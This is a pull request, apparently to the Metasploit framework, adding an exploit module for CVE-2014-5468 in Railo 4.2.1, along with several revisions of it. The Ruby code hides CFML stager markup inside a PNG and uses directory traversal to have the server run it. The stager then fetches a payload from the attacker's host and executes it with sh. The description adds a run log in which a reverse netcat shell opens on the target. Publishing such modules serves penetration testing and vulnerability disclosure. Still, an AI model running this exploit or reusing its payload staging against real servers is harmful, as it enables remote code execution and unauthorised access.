### PR TITLE
Create railo_cfml_rfi.rb

### DIFF
--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -2,32 +2,43 @@
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
- 
+
 require 'msf/core'
- 
+
 class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
- 
+
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HttpServer
- 
+
   def initialize(info = {})
     super(update_info(info,
       'Name' => 'Railo Remote File Include',
-      'Description' => '',
+      'Description' => %q{
+      This module exploits a remote file include vulnerability in Railo,
+      tested against version 4.2.1. First, a call using a vulnerablea
+      <cffile> line in thumbnail.cfm allows an atacker to download an
+      arbitrary PNG file. By appending a .cfm, and taking advantage of
+      a directory traversal, an attacker can append cold fusion markup
+      to the PNG file, and have it interpreted by the server. This is
+      used to stage and execute a fully-fledged payload.
+      },
       'License' => MSF_LICENSE,
       'Author' => [
-        'dronesec', #Discovery/PoC
+        'Bryan Alexander <drone@ballastsecurity.net>', #Discovery/PoC
         'bperry' #metasploited
       ],
-      'References' => [],
+      'References' => [
+        ['CVE', '2014-5468'],
+        ['URL', 'http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/']
+      ],
       'Payload' => {
         'Space' => 99999, #if there is disk space, I think we will fit
         'BadChars' => "",
         'DisableNops' => true,
         'Compat' => {
           'PayloadType' => 'cmd',
-          'RequiredCmd' => 'generic netcat'
+          'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
         }
       },
       'Platform' => %w{ unix },
@@ -42,71 +53,79 @@ class Metasploit4 < Msf::Exploit::Remote
         ],
       ],
       'DefaultTarget' => 0,
-      'DisclosureDate' => 'Aug 28 2014'))
+      'DisclosureDate' => 'Aug 26 2014'))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
+          OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
+        ], self.class)
   end
- 
+
   def check
- 
   end
- 
+
   def exploit
- 
     if datastore['SRVHOST'] == '0.0.0.0'
-      fail_with('SRVHOST must be an IP address accessible from another computer')
+      fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer')
     end
- 
+
     url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
- 
+
     @shell_name = Rex::Text.rand_text_alpha(15)
     stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'
- 
+
     start_service({'Uri' => {
       'Proc' => Proc.new { |cli, req|
         on_request_stager(cli, req)
       },
       'Path' => '/' + stager_name
     }})
- 
+
     start_service({'Uri' => {
       'Proc' => Proc.new { |cli, req|
         on_request_shell(cli, req)
       },
       'Path' => '/' + @shell_name
     }})
- 
+
+    wh = '5000' #width and height
+
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path + '/admin/thumbnail.cfm'),
       'vars_get' => {
         'img' => url + '/' + stager_name,
-        'height' => '5000',
-        'width' => '5000'
+        'height' => wh,
+        'width' => wh
       }
     })
- 
+
     unless (res && res.code == 500)
-      fail_with('Server did not respond in an expected way.')
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way.')
     end
- 
+
     print_status('Waiting for first stage to download...')
- 
-    i = 10
+
+    i = datastore['STAGEWAIT']
     while !@staged && i > 0
       select(nil, nil, nil, 1)
       print_status("Waiting for #{i} more seconds...")
       i = i - 1
     end
- 
+
     @staged = false
- 
+
     if i == 0
-      fail_with('Server did not request the stager.')
+      fail_with(Failure::Unknown, 'Server did not request the stager.')
     end
- 
-    hash = Rex::Text.md5("#{url + "/" + stager_name}-5000-5000") #5000 is width and height from GET
- 
+
+    hash = Rex::Text.md5("#{url + "/" + stager_name}-#{wh}-#{wh}") #5000 is width and height from GET
+
     hash.upcase!
- 
-    res = send_request_cgi({
+
+    print_status('Executing stager')
+
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'),
       'vars_get' => {
         'attributes.src' => '../../../../temp/admin-ext-thumbnails/' + hash,
@@ -114,29 +133,38 @@ class Metasploit4 < Msf::Exploit::Remote
       }
     })
   end
- 
+
   def on_request_shell(cli, request)
+    print_status('Sending payload')
     send_response(cli, payload.encoded, {})
     handler(cli)
   end
- 
+
   def on_request_stager(cli, request)
     url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
-    stager = '<cfexecute name="wget" arguments="'+url+'" timeout="99999"></cfexecute>'
+
+    stager = "<cfhttp method='get' url='#{url}'"
+    stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"
+    stager << " file='#{@shell_name}'>"
     stager << '<cfexecute name="sh" arguments="'+@shell_name+'" timeout="99999"></cfexecute>'
- 
-    png = `curl http://weaknetlabs.com/images/metasploit-i-got-in.png`
- 
+
+    png = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcS'
+    png << 'JAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg=='
+
+    #A very small PNG file
+    png = Rex::Text.decode_base64(png)
+
     stager.each_byte do |b|
       png << b
     end
- 
+
     png << 0x00
- 
+
+    print_status('Sending stage. This might be sent multiple times.')
     send_response(cli, png, { 'Content-Type' => 'image/png' })
- 
+
     @staged = true
- 
+
     handler(cli)
   end
 end

--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -63,11 +63,18 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def check
+
+    md5 = '6de48cb72421cfabdce440077a921b25' #/res/images/id.png
+
     res = send_request_cgi({
-      'url' => normalize_uri(target_uri.path, 'res', 'css', 'admin42.css.cfm')
+      'uri' => normalize_uri('res', 'images', 'id.png') #the targeturi is not used in this request
     })
 
-    return Exploit::CheckCode::Appears if res and res.code == 200
+    fail_with(Failure::Unknown, "Server did not respond in an expected way") unless res and res.body
+
+    new_md5 = Rex::Text.md5(res.body)
+
+    return Exploit::CheckCode::Appears if new_md5 == md5
 
     return Exploit::CheckCode::Safe
   end

--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+ 
+require 'msf/core'
+ 
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+ 
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+ 
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Railo Remote File Include',
+      'Description' => '',
+      'License' => MSF_LICENSE,
+      'Author' => [
+        'dronesec', #Discovery/PoC
+        'bperry' #metasploited
+      ],
+      'References' => [],
+      'Payload' => {
+        'Space' => 99999, #if there is disk space, I think we will fit
+        'BadChars' => "",
+        'DisableNops' => true,
+        'Compat' => {
+          'PayloadType' => 'cmd',
+          'RequiredCmd' => 'generic netcat'
+        }
+      },
+      'Platform' => %w{ unix },
+      'Targets' =>
+      [
+        [
+          'Automatic',
+          {
+            'Platform' => [ 'unix' ],
+            'Arch' => ARCH_CMD,
+          },
+        ],
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Aug 28 2014'))
+  end
+ 
+  def check
+ 
+  end
+ 
+  def exploit
+ 
+    if datastore['SRVHOST'] == '0.0.0.0'
+      fail_with('SRVHOST must be an IP address accessible from another computer')
+    end
+ 
+    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
+ 
+    @shell_name = Rex::Text.rand_text_alpha(15)
+    stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'
+ 
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_stager(cli, req)
+      },
+      'Path' => '/' + stager_name
+    }})
+ 
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_shell(cli, req)
+      },
+      'Path' => '/' + @shell_name
+    }})
+ 
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path + '/admin/thumbnail.cfm'),
+      'vars_get' => {
+        'img' => url + '/' + stager_name,
+        'height' => '5000',
+        'width' => '5000'
+      }
+    })
+ 
+    unless (res && res.code == 500)
+      fail_with('Server did not respond in an expected way.')
+    end
+ 
+    print_status('Waiting for first stage to download...')
+ 
+    i = 10
+    while !@staged && i > 0
+      select(nil, nil, nil, 1)
+      print_status("Waiting for #{i} more seconds...")
+      i = i - 1
+    end
+ 
+    @staged = false
+ 
+    if i == 0
+      fail_with('Server did not request the stager.')
+    end
+ 
+    hash = Rex::Text.md5("#{url + "/" + stager_name}-5000-5000") #5000 is width and height from GET
+ 
+    hash.upcase!
+ 
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'),
+      'vars_get' => {
+        'attributes.src' => '../../../../temp/admin-ext-thumbnails/' + hash,
+        'thistag.executionmode' => 'start'
+      }
+    })
+  end
+ 
+  def on_request_shell(cli, request)
+    send_response(cli, payload.encoded, {})
+    handler(cli)
+  end
+ 
+  def on_request_stager(cli, request)
+    url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
+    stager = '<cfexecute name="wget" arguments="'+url+'" timeout="99999"></cfexecute>'
+    stager << '<cfexecute name="sh" arguments="'+@shell_name+'" timeout="99999"></cfexecute>'
+ 
+    png = `curl http://weaknetlabs.com/images/metasploit-i-got-in.png`
+ 
+    stager.each_byte do |b|
+      png << b
+    end
+ 
+    png << 0x00
+ 
+    send_response(cli, png, { 'Content-Type' => 'image/png' })
+ 
+    @staged = true
+ 
+    handler(cli)
+  end
+end

--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -17,10 +17,10 @@ class Metasploit4 < Msf::Exploit::Remote
       'Description' => %q{
       This module exploits a remote file include vulnerability in Railo,
       tested against version 4.2.1. First, a call using a vulnerable
-      <cffile> line in thumbnail.cfm allows an attacker to download an
-      arbitrary PNG file. By appending a .cfm and taking advantage of
+      <cffile> line in thumbnail.cfm allows an atacker to download an
+      arbitrary PNG file. By appending a .cfm, and taking advantage of
       a directory traversal, an attacker can append cold fusion markup
-      to the PNG file and have it interpreted by the server. This is
+      to the PNG file, and have it interpreted by the server. This is
       used to stage and execute a fully-fledged payload.
       },
       'License' => MSF_LICENSE,
@@ -63,6 +63,13 @@ class Metasploit4 < Msf::Exploit::Remote
   end
 
   def check
+    res = send_request_cgi({
+      'url' => normalize_uri(target_uri.path, 'res', 'css', 'admin42.css.cfm')
+    })
+
+    return Exploit::CheckCode::Appears if res and res.code == 200
+
+    return Exploit::CheckCode::Safe
   end
 
   def exploit
@@ -92,7 +99,7 @@ class Metasploit4 < Msf::Exploit::Remote
     wh = '5000' #width and height
 
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path + '/admin/thumbnail.cfm'),
+      'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
       'vars_get' => {
         'img' => url + '/' + stager_name,
         'height' => wh,

--- a/modules/exploits/linux/http/railo_cfml_rfi.rb
+++ b/modules/exploits/linux/http/railo_cfml_rfi.rb
@@ -16,11 +16,11 @@ class Metasploit4 < Msf::Exploit::Remote
       'Name' => 'Railo Remote File Include',
       'Description' => %q{
       This module exploits a remote file include vulnerability in Railo,
-      tested against version 4.2.1. First, a call using a vulnerablea
-      <cffile> line in thumbnail.cfm allows an atacker to download an
-      arbitrary PNG file. By appending a .cfm, and taking advantage of
+      tested against version 4.2.1. First, a call using a vulnerable
+      <cffile> line in thumbnail.cfm allows an attacker to download an
+      arbitrary PNG file. By appending a .cfm and taking advantage of
       a directory traversal, an attacker can append cold fusion markup
-      to the PNG file, and have it interpreted by the server. This is
+      to the PNG file and have it interpreted by the server. This is
       used to stage and execute a fully-fledged payload.
       },
       'License' => MSF_LICENSE,


### PR DESCRIPTION
This PR creates a new module that exploits dronesec's CVE-2014-5468 vulnerability detailed here: http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/

There are a few things in this module that are of concern however. For one, I need an image of a larger size in order to exploit this. I currently just call curl in order to get this image. It would be great if there was an image in the tree that I could simply read from the FS relatively from the module, as the curl I am doing is hella-hacky. Would love some feedback on how to do this properly.

Also need to add a check method, still. Wanted to get some initial critique. This is a relatively preliminary PR.

Quick run:

```
msf exploit(railo_cfml_rfi) > show options

Module options (exploit/linux/http/railo_cfml_rfi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    172.31.16.19     yes       The target address
   RPORT    8888             yes       The target port
   SRVHOST  172.31.16.19     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.31.16.19     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(railo_cfml_rfi) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 172.31.16.19:4444 
[*] Using URL: http://172.31.16.19:8080/nhgmBsPfiqHUfwr.cfm
[*] Using URL: http://172.31.16.19:8080/CkvIPPhUbWfNeuP
msf exploit(railo_cfml_rfi) >   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16013  100 16013    0     0  19409      0 --:--:-- --:--:-- --:--:-- 20192
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16013  100 16013    0     0  32956      0 --:--:-- --:--:-- --:--:-- 32948
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16013  100 16013    0     0  69944      0 --:--:-- --:--:-- --:--:-- 70232
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 16013  100 16013    0     0  32189      0 --:--:-- --:--:-- --:--:-- 32546
[*] Waiting for first stage to download...
[*] Command shell session 2 opened (172.31.16.19:4444 -> 172.31.16.19:60187) at 2014-08-28 06:40:59 -0700
[*] Server stopped.

msf exploit(railo_cfml_rfi) > sessions -l

Active sessions
===============

  Id  Type        Information  Connection
  --  ----        -----------  ----------
  2   shell unix               172.31.16.19:4444 -> 172.31.16.19:60187 (172.31.16.19)

msf exploit(railo_cfml_rfi) > sessions -i 2
[*] Starting interaction with 2...

id
uid=1000(bperry) gid=1000(bperry) groups=1000(bperry),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)

```
